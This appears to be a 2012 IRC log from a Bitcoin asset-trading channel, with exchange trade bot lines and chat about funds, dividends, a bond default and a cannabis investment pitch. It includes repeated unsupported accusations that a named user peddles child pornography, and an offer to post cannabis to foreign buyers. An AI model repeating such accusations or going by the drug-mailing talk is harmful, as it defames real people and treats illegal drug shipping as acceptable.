you have any plan to sell FDBF outside GLBSE? Sep 30 22:38:09 Baston if you have nothing to say more, you do better be quiet ... Sep 30 22:38:12 Who cares that you trade with yourself all day because you have no life. Sep 30 22:38:24 lol Sep 30 22:38:28 All the shares on your exchange are valued at less than a penny per share and you think that makes for high volume. Sep 30 22:38:32 hey this is fun Sep 30 22:38:38 .g nsfw gradina edenului Sep 30 22:38:40 mircea_popescu: http://trilema.com/2011/nsfw-gradina-edenului/ Sep 30 22:38:45 there, that's my lack of life. Sep 30 22:39:09 depends on the future of GLBSE, cryptostocks at the moment sucks big time, and Mpex is not as accessible as I wish Sep 30 22:39:20 mircea_popescu runs a horrible exchange, is a troll, peddles child porn, has a horribly ugly internet girlfriend, and thinks he is some kind of important figure in the BTC community despite being one of the most highly ignored individuals on the forum. Sep 30 22:39:22 PsychoticBoy why'd it suck big time ? Sep 30 22:39:33 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 30 22:39:33 Bastone im not on the forum. Sep 30 22:39:51 also, the girl's performance at being ignored is appaling. reeses does much better. Sep 30 22:39:58 so does atlas. and so many people ;/ Sep 30 22:40:05 PsychoticBoy: I was very happy with my 300 shares of FDBF, but I am selling (those at 0.149253 are mine, 39 remaining) because I really want out of GLBSE, I don't trust the site with my BTC anymore after the recent Goat assets drama Sep 30 22:40:05 mircea_popescu: You are the biggest forum troll there is... Your "fake girlfriend PR account" is the most ignored... Sep 30 22:40:07 did I talk bad about mpex? cryptostocks got ultra low volume so...... Sep 30 22:40:19 PsychoticBoy o, cause of the volume ? mk. Sep 30 22:40:20 Baston did you loose something? Or you just personally dislike him? Sep 30 22:40:26 Goat was a scammer. Sep 30 22:40:29 i keep waiting to see a trade stream from them, hasn't happened yet. Sep 30 22:40:54 If Mpex is so great, why not let Goat list his share there? Oh wait, cuz nobody in their right mind would sign up to claim their shares. Sep 30 22:41:08 so Bastone did EskimoBob pay you to attack my exchange ? hm ? Sep 30 22:41:18 goat had a mining company without even owning hardware and was paying 1mh/s ( he made up all sorts of contratcts) so yes Goat is in my eyes a Scammer Sep 30 22:41:22 mircea_popescu: I keep waiting for one of your listings to get above 0.0001BTC/share... I'll keep waiting. Sep 30 22:41:32 !ticker s.dice Sep 30 22:41:33 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (900 shares, 3.06 BTC), 30day: 0.0033 / 0.00337051 / 0.0034 (2363535 shares, 7,966.34 BTC) Sep 30 22:41:39 there, that's over 0.0001 Sep 30 22:42:03 that's not close to 9000 at all Sep 30 22:42:07 mircea_popescu: Nobody paid me to attack you. I'm doing it out of pure hatred of your child porn peddling, fake exchange running, no girlfriend having, troll ass. Sep 30 22:42:08 PsychoticBoy: that's not the point - Goat may be a scammer, but GLBSE could have handled it much more gracefully for the investors Sep 30 22:42:20 OneEyed how long have you been around btc/finance btw ? Sep 30 22:42:22 you seem up to speed. Sep 30 22:42:23 so eventually Goat sucked the btc out of investors, F*cking goat behhh Sep 30 22:42:35 Everyone knew Goat was a scammer.... Sep 30 22:42:38 mircea_popescu: not much, I don't like the "real" finance world much :) Sep 30 22:42:39 It was inevitable. Sep 30 22:42:46 thats true, nefario had a short fuse Sep 30 22:42:51 OneEyed well propos for your documentary skills then Sep 30 22:43:00 Bastone so exactly why do you hate me ? Sep 30 22:43:05 Just like everyone knows mircea_popescu is a child porn peddler with the worst exchange ever created. Sep 30 22:43:05 (purely) Sep 30 22:43:17 mircea_popescu: Because I'm tired of your trolling. Sep 30 22:43:24 well actually... that bitdaytrade thing was provably worse. Sep 30 22:43:27 Stop trolling the forum, and maybe I'll give it a rest. Sep 30 22:43:35 o i c Sep 30 22:43:55 this is virulent criminal blackmailing! Sep 30 22:44:04 whats up with the trolling lately? I wish it were 2011 again Sep 30 22:44:05 by posting on the forums you are either: 1. a ponzi. 2. trolling 3. scammer Sep 30 22:44:07 No. It's trolling. Sep 30 22:44:32 grubles you could also be bored. Sep 30 22:44:39 yes true Sep 30 22:44:41 If you would like another dick riding troll following you around, keep up what you've been up to the last 12 hours. Sep 30 22:44:57 can you get moar specific ? Sep 30 22:45:08 Can you stop trolling? Sep 30 22:45:33 well my ability to stop trolling would seem to hinge on your control over the voices. Sep 30 22:45:39 Eye for an eye, we both lose our sight. Sep 30 22:45:43 can you get whoever is in your head telling you im trolling to shut up ? Sep 30 22:45:44 I got trolls for sale, the onces with long colored hair ;) Sep 30 22:46:00 populair in the late 90`s Sep 30 22:46:10 MPOE-PR needs to shut the fuck up. Sep 30 22:46:22 what;d she say ? Sep 30 22:46:26 Since that is your fake girlfriend alter-ego. I assume you have the ability to stop her. Sep 30 22:46:32 lol Sep 30 22:46:49 girl's unstoppable. Sep 30 22:46:54 Bastone, you can always hit the ignore button Sep 30 22:47:16 grubles: I've tried. She has more sock puppets than rolls in her gut it would seem. Sep 30 22:47:20 ... Sep 30 22:47:26 what sock puppets ?! Sep 30 22:47:42 oh yeah forgot about that possibility when posting to the forums Sep 30 22:47:47 Oh, MPOE-PR is mircea_popescu girlfriend? I haven't followed the sitcom apparently, I thought it was Mircea himself. Sep 30 22:47:52 5. you are a sock puppet Sep 30 22:47:56 OneEyed actually she's neither. Sep 30 22:47:59 i got a sock puppet, lots of them, I got the whole muppetshow Sep 30 22:48:14 burskinbur chop chop chop Sep 30 22:48:26 she's just a chick with generous cleavage that works forum pr for me. Sep 30 22:48:35 nice Sep 30 22:49:00 so Bastone, do we know you under some other name ? Sep 30 22:49:30 You don't know anyone it seems. You're too important to bother yourself with regular Bitcoiners. Sep 30 22:49:37 hm. Sep 30 22:49:40 You can call me usagi if you'd like. Sep 30 22:49:42 haha Sep 30 22:49:54 Or you could call me MPOE-PR Sep 30 22:50:04 now seriously... why are you such a noob ? Sep 30 22:50:08 call me grand master Sep 30 22:50:19 I'm not a noob. Sep 30 22:50:24 mk. Sep 30 22:50:32 so you really think you can sell me naked puts on your own stock ? Sep 30 22:51:03 shave my nuts and call me grandpa Sep 30 22:51:03 You're funny. Sep 30 22:51:29 well... i'm not trying (badly) to be anon while flinging stupid shit at people. Sep 30 22:51:50 You fling stupid shit at people all day. Sep 30 22:51:58 no. my shit is smart. Sep 30 22:52:12 when cows fly then there would be flying shit Sep 30 22:52:26 Keep telling yourself that. Sep 30 22:52:36 damn I have to stop drinkin beer Sep 30 22:53:34 mircea_popescu: Lists his asset on competing exchange while bashing it. haha Sep 30 22:53:44 what asset would that be ? Sep 30 22:53:48 [MPEX] [F.GIGA.ETF] 2400 @ 0.00044037 = 1.0569 BTC [+] Sep 30 22:53:50 [MPEX] [F.GIGA.ETF] 7600 @ 0.00044037 = 3.3468 BTC [+] Sep 30 22:53:58 asshat passthru Sep 30 22:54:07 name ? Sep 30 22:54:15 I'm not going to take the time to look it up. Sep 30 22:54:18 ... Sep 30 22:54:35 mircea_popescu: you're wasting space, use "…" instead, Unicode rules :) Sep 30 22:55:17 if i had it my way it'd be forbidden to use languages on the internet. Sep 30 22:55:24 english letters and stfu. Sep 30 22:55:38 Like "touché"? Sep 30 22:55:38 . . . Sep 30 22:55:43 touche you mean Sep 30 22:55:57 lol pigeons you troll you! Sep 30 22:56:04 ⋅⋅⋅ Sep 30 22:56:24 ° ° ° Sep 30 22:56:37 that's WTF-32 Sep 30 22:56:38 mircea_popescu: I already notice you seem to think that uppercase letters are useless, now accented characters. 26 letters ought to be enough for everybody Sep 30 22:56:46 exacTLY! Sep 30 22:57:11 Learn Portuguese, they have 23 letters, no K, W or Y Sep 30 22:57:20 i'm sorta decent in portuguese Sep 30 22:57:27 i can read it at any rate. Sep 30 22:58:39 bitcoin-central.net has such a low liquidity… all trades for 2 days have been mine, that will total 20 BTC… Sep 30 22:58:51 i didn't even know it existed. Sep 30 22:59:09 They have a French bank account, much better than the usual Polish one for other exchanges Sep 30 22:59:29 someone had sepa tho no ? Sep 30 22:59:44 Yeah, all European exchanges Sep 30 23:00:33 Bitcoin-Central is a service operated by the French company Paymium. Sep 30 23:00:51 these the Paytunia folks ? Sep 30 23:01:10 FDBF dividend payment in 10 min Sep 30 23:01:38 mircea_popescu: yes, davout & crew Sep 30 23:01:50 ya Sep 30 23:02:19 well i must confess this trolling was very unsatisfactory. Sep 30 23:02:48 should i ever have a company profile with photos, Sep 30 23:02:50 trolling on the river Sep 30 23:02:51 girl told him he's not intellectually prepared to do naked puts, he comes here to prove it !? but whay! Sep 30 23:03:01 i'll list the positions as Chief Sockpuppet Sep 30 23:03:12 jurov i knew a guy named Sockpill Sep 30 23:03:37 puts his xtc pills in his socks while going into the disco Sep 30 23:03:46 lol Sep 30 23:03:52 true Sep 30 23:04:10 PsychoticBoy: I don't know if you've seen it, but EskimoBob was enquiring about any software used to manage FDBF Sep 30 23:04:11 nice... and what about Chief Bitcoin Peddler Sep 30 23:04:22 (he thought I was one of the owners, because I praised it) Sep 30 23:04:39 nope not yet OneEyed, looking right now Sep 30 23:04:49 PsychoticBoy: should be in the history of this channel Sep 30 23:05:09 searching Sep 30 23:05:14 16:24:23* EskimoBob | OneEyed: you manage the FDBF? Do you guys use any accounting or portfolio management software? │@assbot Sep 30 23:05:31 in general using something is a good ideea. Sep 30 23:05:50 gnucash for instance Sep 30 23:05:53 (was 14:24 UTC today) Sep 30 23:05:53 we use formulas in google docs spreadsheet, and fill in manualy Sep 30 23:06:32 fdbf is PsychoticBoy + paladon no ? Sep 30 23:06:40 yes Sep 30 23:07:01 we both control FDBF Sep 30 23:07:11 can i see your portofolio somewhere ? Sep 30 23:07:17 And you seem to do a pretty fucking job. Nice returns + nice reporting Sep 30 23:07:31 16:24:23* EskimoBob | OneEyed: you manage the FDBF? Do you guys use any accounting or portfolio management software? │@assbot Sep 30 23:07:37 (sorry for the bad paste) Sep 30 23:07:50 mircea_popescu: https://docs.google.com/spreadsheet/pub?key=0AkzS_thDsmwudHVKcFdMRXg5cjY3eklqNmxHeGlIeXc&single=true&gid=0&output=html Sep 30 23:08:04 thanks OneEyed ;) Sep 30 23:08:17 PsychoticBoy: I happened to have it open in my browser Sep 30 23:08:35 ~500 btc total capital ? Sep 30 23:09:06 I am paying div in a couple a minutes, spreadsheet will be adapted first thing in the morning Sep 30 23:09:06 aha this is pretty nice actually. Sep 30 23:09:20 see usagi, this is how setting the standards looks. Sep 30 23:09:29 cause its 22:09 over here Sep 30 23:09:38 :D Sep 30 23:09:48 Oh yeah, I forgot you were in the same time zone as me Sep 30 23:09:57 learn from failures makes new companies a succes Sep 30 23:10:27 what failures you mean ? Sep 30 23:10:33 NAV failures Sep 30 23:10:43 I'm not sure they is much potential for growth though. Liquidity on GLBSE is so low, that you wouldn't know what to do with 10,000 BTC if you could sell all the shares Sep 30 23:10:49 ^they^there Sep 30 23:10:53 PsychoticBoy suggestion ; put the numbers by the names on the right hand piechart Sep 30 23:11:00 and lack information to shareholdersw Sep 30 23:11:04 not just on the piechart but also next to the symbols Sep 30 23:11:04 lack of Sep 30 23:11:16 [GLBSE] [TEEK.B] 1 @ 0.48939999 BTC [+] Sep 30 23:11:18 [GLBSE] [TEEK.B] 24 @ 0.4894 = 11.7456 BTC [+] Sep 30 23:11:19 [GLBSE] [TEEK.B] 8 @ 0.4895 = 3.916 BTC [+] Sep 30 23:11:20 [GLBSE] [TEEK.B] 10 @ 0.49 = 4.9 BTC [+] Sep 30 23:11:21 OneEyed he'd have to buy a mpex acct if he got 10k btc i guess. Sep 30 23:11:28 ok I will get into that mircea Sep 30 23:11:33 mircea_popescu: yeah, probably Sep 30 23:12:02 If he got 500 BTC he should have an MPEX account Sep 30 23:12:05 10k btc? Sep 30 23:12:12 Guest71873 who're you ?! Sep 30 23:12:21 PsychoticBoy: didn't you want to sell 100k shares? Sep 30 23:12:30 yes, thats the plan Sep 30 23:12:38 all at 0.15 Sep 30 23:12:44 PsychoticBoy: oh, you're right, face value is .15, not .1, so 15kBTC Sep 30 23:12:55 ouch you got 100 btc in fpgamining, isn't that awol ? Sep 30 23:13:02 hopefully eventually Sep 30 23:13:19 a man who forgot to identify in time Sep 30 23:13:22 thats indeed a lot, selling them at a loss atm Sep 30 23:13:22 what's jah, jwu's thing ? Sep 30 23:13:36 no rastapool i think Sep 30 23:13:41 hm Sep 30 23:14:11 so Sep 30 23:14:19 did nefario commit suicide or not Sep 30 23:14:24 what's "dividend sold assets" mean PsychoticBoy ? Sep 30 23:14:24 lol Sep 30 23:14:26 verification on GLBSE means nothing these days, I can only get verified on 2 of 6 Sep 30 23:14:29 ;;seen nefario Sep 30 23:14:30 nefario was last seen in #bitcoin-assets 6 days, 0 hours, 14 minutes, and 32 seconds ago: Those assets are not listed or traded anymore Sep 30 23:14:45 assets that were sold and also paid div that week Sep 30 23:14:56 I wonder how much vescudero payed out of his own pocket to be able to pay all his investors back, and right in time. This was a tremendous service, but I bet this has been an awful loss for him. Sep 30 23:15:16 OneEyed some k's went there yea Sep 30 23:15:24 I had some btc with vescudero but withdrawed a few months ago Sep 30 23:15:31 he's not the only one paying out of pocket actually. there's abour a dozen people, so is/was goat Sep 30 23:15:38 so was imsaguy, buncha ppl around ppts Sep 30 23:16:04 mircea_popescu: yeah, but some of them had a chance to make a profit before. I think vescudero was just entering the btc game, so no profit to reinvest there. Sep 30 23:16:17 6 fucking days man Sep 30 23:16:18 ahaha completed loan poopidypoop! whoa btc statement sheets rule Sep 30 23:16:20 6 FUCKING DAYS MAAAAAAAAAAN Sep 30 23:16:36 woah he could have turned into a being of pure energy Sep 30 23:16:38 Hes probably at that bitcoin conference Sep 30 23:16:42 still Sep 30 23:16:46 Bugpowder_: the one he already came home from? Sep 30 23:16:49 Bugpowder_ lol like the ghostship ? Sep 30 23:16:53 after doing like a ton of coke Sep 30 23:17:06 what coke ? meth. coke is expensive. Sep 30 23:17:38 nice got some? Sep 30 23:17:49 FDBF dividends have been paid! Sep 30 23:18:01 o glbse still doesn't announce divs huh Sep 30 23:18:05 meth hurts about 10 times more afterwards Sep 30 23:18:16 PsychoticBoy: confirmed Sep 30 23:18:39 Bugpowder_ sorta like glbse investing :D Sep 30 23:18:50 btw do you know how to use ghost/release ? Sep 30 23:18:56 [MPEX] [S.MPOE] 550 @ 0.00036498 = 0.2007 BTC [+] Sep 30 23:18:58 [MPEX] [S.MPOE] 8650 @ 0.00036436 = 3.1517 BTC [-] Sep 30 23:19:29 not rly Sep 30 23:19:39 [MPEX] [F.GIGA.ETF] 1039 @ 0.00044037 = 0.4575 BTC [+] Sep 30 23:19:40 [MPEX] [F.GIGA.ETF] 4224 @ 0.00044037 = 1.8601 BTC [+] Sep 30 23:19:41 [MPEX] [F.GIGA.ETF] 941 @ 0.00044037 = 0.4144 BTC [+] Sep 30 23:19:42 [MPEX] [F.GIGA.ETF] 400 @ 0.00044037 = 0.1761 BTC [+] Sep 30 23:19:43 [MPEX] [F.GIGA.ETF] 600 @ 0.00044037 = 0.2642 BTC [+] Sep 30 23:19:44 [MPEX] [F.GIGA.ETF] 800 @ 0.00044037 = 0.3523 BTC [+] Sep 30 23:19:44 you go /msg nickserv release password Sep 30 23:19:45 [MPEX] [F.GIGA.ETF] 4900 @ 0.00044037 = 2.1578 BTC [+] Sep 30 23:19:46 [MPEX] [F.GIGA.ETF] 4500 @ 0.00044037 = 1.9817 BTC [+] Sep 30 23:19:47 [MPEX] [F.GIGA.ETF] 5890 @ 0.00044037 = 2.5938 BTC [+] Sep 30 23:19:48 [MPEX] [F.GIGA.ETF] 740 @ 0.00044037 = 0.3259 BTC [+] Sep 30 23:19:49 [MPEX] [F.GIGA.ETF] 7300 @ 0.00044037 = 3.2147 BTC [+] Sep 30 23:19:50 [MPEX] [F.GIGA.ETF] 3729 @ 0.00044037 = 1.6421 BTC [+] Sep 30 23:19:51 [MPEX] [F.GIGA.ETF] 2614 @ 0.00044037 = 1.1511 BTC [+] Sep 30 23:19:51 [MPEX] [F.GIGA.ETF] 3682 @ 0.00044037 = 1.6214 BTC [+] Sep 30 23:19:52 [MPEX] [F.GIGA.ETF] 2600 @ 0.00044037 = 1.145 BTC [+] Sep 30 23:19:54 [MPEX] [F.GIGA.ETF] 6041 @ 0.00044037 = 2.6603 BTC [+] Sep 30 23:19:59 and you can then log in as your proper name Sep 30 23:20:43 [MPEX] [F.GIGA.ETF] 100 @ 0.00044037 = 0.044 BTC [+] Sep 30 23:20:44 [MPEX] [F.GIGA.ETF] 4392 @ 0.00044037 = 1.9341 BTC [+] Sep 30 23:20:45 [MPEX] [F.GIGA.ETF] 6100 @ 0.00044046 = 2.6868 BTC [+] Sep 30 23:20:46 [MPEX] [F.GIGA.ETF] 5844 @ 0.00044192 = 2.5826 BTC [+] Sep 30 23:20:47 [MPEX] [F.GIGA.ETF] 2700 @ 0.00044336 = 1.1971 BTC [+] Sep 30 23:20:48 [MPEX] [F.GIGA.ETF] 9000 @ 0.00044891 = 4.0402 BTC [+] Sep 30 23:20:49 [MPEX] [F.GIGA.ETF] 300 @ 0.00050725 = 0.1522 BTC [+] Sep 30 23:20:51 upgrade Sep 30 23:20:51 [MPEX] [F.GIGA.ETF] 1600 @ 0.00051744 = 0.8279 BTC [+] Sep 30 23:20:52 [MPEX] [F.GIGA.ETF] 4964 @ 0.00055755 = 2.7677 BTC [+] Sep 30 23:21:16 wow Sep 30 23:21:40 dividend day coming Sep 30 23:22:50 good luck getting out of that position Sep 30 23:23:04 sigh Sep 30 23:24:12 well i don't have any, i bought some a few days ago for the dividends but had to sell them because they are going for twice what i paid for them Sep 30 23:24:32 keeps happening with them Sep 30 23:24:38 pigeons what is this ? Sep 30 23:24:45 F.GIGA.ETF Sep 30 23:24:55 you bought them for 25 ?! Sep 30 23:24:59 yes Sep 30 23:25:02 wowza. good deal. Sep 30 23:25:16 and 33 too Sep 30 23:25:25 you are welcom Sep 30 23:25:36 lol what you sold ? Sep 30 23:25:47 44 or something Sep 30 23:25:52 dude i thought i was supposed to be trading with myself, stop coming forward and claiming trades Sep 30 23:26:03 I sold 875,000 shares Sep 30 23:26:16 down to 28 Sep 30 23:26:19 oops Sep 30 23:26:43 i just had to counter Bugpowder's opinion on that "good luck" cause i disagree Sep 30 23:27:07 GLBSE's SEC meltdown caused the bounce Sep 30 23:27:16 people shifting assets over Sep 30 23:27:17 well yeah Sep 30 23:28:27 what sense does that make ? Sep 30 23:28:39 giga is sec-proof-er than others ? Sep 30 23:29:02 MPEX is more SEC proof Sep 30 23:29:18 All the pass thrus Sep 30 23:29:24 when glbse goes down, more chance giga pays via mirce than nefario Sep 30 23:29:25 of ponzis Sep 30 23:29:27 are there Sep 30 23:29:59 but mircea's gigas are actually held via glbse Sep 30 23:29:59 https://bitcointalk.org/index.php?topic=106393.msg1167917#msg1167917 who was asking for pot company ? Sep 30 23:30:32 he Sep 30 23:30:35 o yyea Sep 30 23:31:05 I live in the Netherlands so I could make a pot company ( LEGALLY) Sep 30 23:31:06 well, this a market of imperfect investors and information. Sep 30 23:31:07 "Have you considered using GLBSE for this fundraising operation? I would be hesitant to just send you some bitcoins, but if you were verified on GLBSE and offered an IPO I would definitely invest." Sep 30 23:31:13 i like this mindset :D Sep 30 23:32:16 wow I will set up a growing plan for my weed stock, I ll grow and sell and give shareholders a piece of the profit Sep 30 23:32:28 nice Sep 30 23:32:37 PsychoticBoy pay in kind. Sep 30 23:32:38 [GLBSE] [GIGAMINING] 3 @ 0.60949993 = 1.8285 BTC [-] Sep 30 23:32:40 [GLBSE] [GIGAMINING] 1 @ 0.60949994 BTC [+] Sep 30 23:32:40 send leaves through the mail Sep 30 23:32:40 [GLBSE] [GIGAMINING] 1 @ 0.6095 BTC [+] Sep 30 23:32:41 [GLBSE] [GIGAMINING] 11 @ 0.6097 = 6.7067 BTC [+] Sep 30 23:33:11 sure, whats your address? 10$ a gram, ok? Sep 30 23:33:26 lol Sep 30 23:33:30 i don't even smoke Sep 30 23:33:45 I can buy legally here in a coffeeshop Sep 30 23:33:52 Me neither Sep 30 23:33:54 i know, i visit holland ocasionally. Sep 30 23:34:03 nice :D Sep 30 23:34:13 we should have a meet there Sep 30 23:34:22 might be an ideea, tho not in the winter Sep 30 23:34:27 winter there sux Sep 30 23:34:30 sure, you can all just come over Sep 30 23:34:45 actually belgrade would be an ideea Sep 30 23:34:45 rain and about 2C Sep 30 23:34:52 I spent two weeks in Amsterdam this summer, that was nice Sep 30 23:34:57 its a nice town, it's cheap and warm. Sep 30 23:35:03 [GLBSE][S.HASH] Dividend of 5.622 kg sent to notional float of 100000 shares. Sep 30 23:35:06 mircea_popescu, what was that python script for mpex commands? Sep 30 23:35:07 theres a small bitcoin conference in slovenia next week Sep 30 23:35:07 pympex? Sep 30 23:35:12 grubles yup Sep 30 23:35:24 why small and why next weke! Sep 30 23:35:24 ok thx Sep 30 23:35:27 where bitstamp will buy me a coke. Sep 30 23:35:30 i can't travel on a week's notice ffs Sep 30 23:35:45 oeh slovenia, its to far, the btc conference was quite nice and boring though Sep 30 23:36:04 PsychoticBoy, same distance from here to NL than from NL to here Sep 30 23:36:09 i guess NL is far, not slovenia. Sep 30 23:36:38 NL > Slovenia ~5000KM Sep 30 23:36:44 nowai ?! Sep 30 23:36:57 wait Ill ask google Sep 30 23:37:05 hm Sep 30 23:37:06 PsychoticBoy: would you be able to sell to aliens starting 2013? Sep 30 23:37:13 i done that road couple of times Sep 30 23:37:17 1000 km from amsterdam to ljubliana Sep 30 23:37:17 5k km? loooool Sep 30 23:37:19 12-14 hrs Sep 30 23:37:37 could be less Sep 30 23:37:40 depends how you drive Sep 30 23:37:52 anyway not 5k Sep 30 23:37:55 ok then i am able to take that trip in my subaru Sep 30 23:37:59 not unless you go through istanbul Sep 30 23:38:04 lol Sep 30 23:38:20 nice holiday in Turkye ±D Sep 30 23:38:34 ya, turkey is nice in the winter Sep 30 23:38:41 december on bosphorus! Sep 30 23:40:14 PsychoticBoy: would you be able to sell to aliens starting 2013? Sep 30 23:40:16 ??? Sep 30 23:40:16 meh Sep 30 23:40:21 as long as im inside Sep 30 23:40:28 i dont care if its winter or summer Sep 30 23:40:38 or if its prague or adam Sep 30 23:40:40 what guanja Sep 30 23:41:10 PsychoticBoy: yeah, you can't sell weed to foreigners any more, could you sell parts of weed production? Sep 30 23:41:40 I can sell to foreigners, just vacuum and post it Sep 30 23:41:41 [GLBSE] [BTC-BOND] 15 @ 0.00979 = 0.1469 BTC [-] Sep 30 23:41:42 I don't know what the new law (I don't even know if it's a law in fact) covers Sep 30 23:42:04 only you take the risk, here its legal Sep 30 23:42:42 are you an experienced grower? Sep 30 23:43:12 not really I grow 5 plants in my garden legally but can buy great quality at the coffeshop Sep 30 23:43:27 but coffee shop prices are scam Sep 30 23:43:32 yep Sep 30 23:43:40 6-12eur a gram Sep 30 23:44:12 so Sep 30 23:44:18 why would anyone buy that Sep 30 23:44:23 better than at silk road Sep 30 23:44:28 and thats for sure Sep 30 23:44:29 plus pay your costs for shipping and handlig Sep 30 23:45:02 I dont rweally offer it, but since i live in the Netherlands all can buy from me if they wish Sep 30 23:45:17 ok Sep 30 23:45:39 and yes, you pay handling and shipping Sep 30 23:45:47 Define handling :) Sep 30 23:45:49 [MPEX] [S.MPOE] 6500 @ 0.00036596 = 2.3787 BTC [+] Sep 30 23:45:52 so ~1 btc a gram Sep 30 23:46:02 packet and posting Sep 30 23:47:25 [GLBSE] [BBBB] 23 @ 0.000128 = 0.0029 BTC [-] Sep 30 23:56:18 well... i got some very nice garden mint. Sep 30 23:58:48 ok nice, good in my tea or just to chew on Oct 01 00:02:02 We are seeking a total of $1.5 million dollars over the next three years with an initial need for $350,000 Oct 01 00:02:06 https://bitcointalk.org/index.php?topic=106393.0 Oct 01 00:02:12 srsly, what's everyone's take on thsi guy ? Oct 01 00:06:22 not-for-profit (communist) regimen. We believe in CAPITALISM in Colorado. Oct 01 00:06:25 lawl Oct 01 00:07:20 mmmyea Oct 01 00:09:08 well, interesting read. I won't be investing anytime soon with that individual. Oct 01 00:09:56 wonder what the license will cost Oct 01 00:10:41 Mircea , who paying for options on mpex? (In case of they were profitable) Oct 01 00:11:06 Cylta there's a bond system, let me find you the link Oct 01 00:11:32 http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 Oct 01 00:11:40 read that whole thing it details the workings of mpoe Oct 01 00:12:06 [MPEX] [S.MPOE] 15900 @ 0.00036436 = 5.7933 BTC [-] Oct 01 00:12:16 Ignatius-bot the ideea itself may have merit, and he;'s hitting on some nice sales points with civil disobedfience et all Oct 01 00:12:22 just... im wondering how legit he is. Oct 01 00:13:40 Whether or not I ultimately develop a bitcoin bank-like marijuana commercial loan lending service Oct 01 00:13:43 wat Oct 01 00:13:53 [GLBSE] [NYAN.A] 1 @ 0.9 BTC [-] Oct 01 00:14:15 omg what idiot just sold NYAN.A for 0.9 Oct 01 00:14:32 I recall seeing many of his posts throughout btctalk. Even still it doesn't come across to me as an honest business proposal. Large startup costs with little info. Of course, it's only a matter of time before growing and distribution are legalized Oct 01 00:14:43 somebody will profit, i guess phillip morris? Oct 01 00:14:44 dub i dunno. Oct 01 00:15:07 Ignatius-bot still, if you started a largeish farm i could see 1mn sunk into it Oct 01 00:15:19 even if it's just a guy-and-his-gf type of op Oct 01 00:15:20 sure Oct 01 00:15:49 but why do they need capital from bitcoin market? Oct 01 00:16:03 yes but if I go to get a loan I need to provide something showing why I need the amount I claim to need Oct 01 00:16:08 now that is the odd part. he says cause we're philosophically aliogned. Oct 01 00:16:17 :) Oct 01 00:16:20 problem is, we're economically unalligned, if btc goes way up he's way fucked. Oct 01 00:16:48 obviously he could get options to hedge, but still. Oct 01 00:16:48 I think any legit producer can get investment easily from non-bitcoin denominated things Oct 01 00:17:03 me too, especially if he has the sense to manage a 1mn dollar hydroponics farm Oct 01 00:17:09 mircea_popescu, have you created a glbse short asset yet Oct 01 00:17:12 he should have the sense to write a pretty decent business proposal Oct 01 00:17:21 Ignatius-bot asset no. i just do it on my own account. Oct 01 00:17:24 he can just denominate in USD? Oct 01 00:17:36 dub if he does then buying it would be divesting btc. who wants that ? Oct 01 00:18:12 (btw i am shocked, shocked i say at the unseemly volume of actual financial discussion taking place in thsi chan of late) Oct 01 00:18:21 well you still get returns Oct 01 00:18:24 http://polimedia.us/dtng/c/src/13467854193.jpg have a girl. Oct 01 00:18:27 presumably Oct 01 00:19:05 mircea_popescu: this is the first time I come to this channel, are you saying the volume of financial discussion went up recently? Oct 01 00:19:12 (I cannot tell if you are sarcastic or serious) Oct 01 00:19:17 OneEyed i was dead serious. Oct 01 00:19:22 Oh Oct 01 00:19:53 well the unseemly part was sarcastic. Oct 01 00:19:54 I think its just a bubble. Oct 01 00:19:58 ahahaha Oct 01 00:20:02 Eheh Oct 01 00:20:25 kakobrekla, have you posted a thread to btctalk yet about the new service? Oct 01 00:20:45 actually, kakobrekla, some reports ? what'stotal volume processed yet ? Oct 01 00:20:57 no, i will open the page for public tomorrow but btctalk annoucment will wait a few more days Oct 01 00:21:02 no I think we have reached an inflection point Oct 01 00:21:07 wait Oct 01 00:21:13 which service are you asking me again of? Oct 01 00:21:19 bit4x goes tomorrow Oct 01 00:21:30 ok well please link it here I get lost wading through btctalk drama Oct 01 00:21:32 kakobrekla smpake Oct 01 00:21:49 its on the bottom of the page Oct 01 00:21:50 Completed txs: 264 | Completed txs vol: 1289 BTC Oct 01 00:21:53 Ignatius-otc stop trolling and lieing and demonizing drama! Oct 01 00:21:59 kakobrekla wow pretty good! Oct 01 00:22:06 well so-so Oct 01 00:22:14 not even a month yet or is it ? Oct 01 00:22:17 i need to add mpex and others Oct 01 00:22:20 it will get better Oct 01 00:22:33 it might be especially useful in mpex case Oct 01 00:22:36 we'll see. Oct 01 00:22:46 no i think its not a month yet Oct 01 00:22:54 or maybe around Oct 01 00:22:59 would need to check that Oct 01 00:23:30 9/30/12 Oct 01 00:23:30 Effective immediately, Oct 01 00:23:30 I am defaulting on my BDK.BND debt. Oct 01 00:23:32 o glorious Oct 01 00:23:41 i never shorted that one :( Oct 01 00:23:43 mircea_popescu: you're late Oct 01 00:23:49 fuckall! Oct 01 00:24:03 mircea_popescu: he still plans to reimburse everything Oct 01 00:24:21 (even if I think he should better borrow to buy his own debt at a discount, since people will panic sell) Oct 01 00:24:24 mircea_popescu, 5 weeks Oct 01 00:24:27 things have been disgusting lately Oct 01 00:24:31 times does fly fast Oct 01 00:24:33 I previously intended to empty my non-legal wife's (we personally consider ourselves married, but legally, we are individual and thus have rights we'd otherwise forfeit) 401(k). I obviously did not want to do this, but it became clear it was necessary as I was looking at $200-250/wk interest on this single debt while having been financially raped by loans to various members of the community Oct 01 00:24:55 apparently planning is not something these forum finance wizards dabble in. Oct 01 00:25:38 I'm sorry he is having troubles but that lady needs to leave. Oct 01 00:25:44 I was just copying that to paste it here Oct 01 00:25:45 when the girl was telling him THE EXACT THING months ago... he was all tail up. Oct 01 00:25:57 im getting so sick of it.. Oct 01 00:26:17 everybody on the forum should be forced to suckle her toes daily for weeks. Oct 01 00:27:06 Kluge, bro, close the computer, and pretend it never happened. Oct 01 00:28:40 "If you are coming for a visit, I would like at least a voice message a day or two prior. Harm toward family's off-limits, and I would physically object to bodily harm which may result in my stay in a hospital, as that'd further impede repayment. I am armed, so please keep ideas of physical violence in check." Oct 01 00:28:48 ... Oct 01 00:28:57 this guy's such a nitwit ffs. Oct 01 00:31:16 Ah, but a man's reach should exceed his grasp, Or what's a heaven for? Oct 01 00:31:35 I guess his grasp did not actually include his girlfriend's retirement account Oct 01 00:31:37 yaright. Oct 01 00:31:49 dude, and i told him to get the fuck off his dragon Oct 01 00:32:08 i can kinda spot a clerk pretending he's a banker and an apprentice pretending he;s a mage. Oct 01 00:37:15 [GLBSE] [PUREMINING] 1 @ 0.10100001 BTC [+] Oct 01 00:37:16 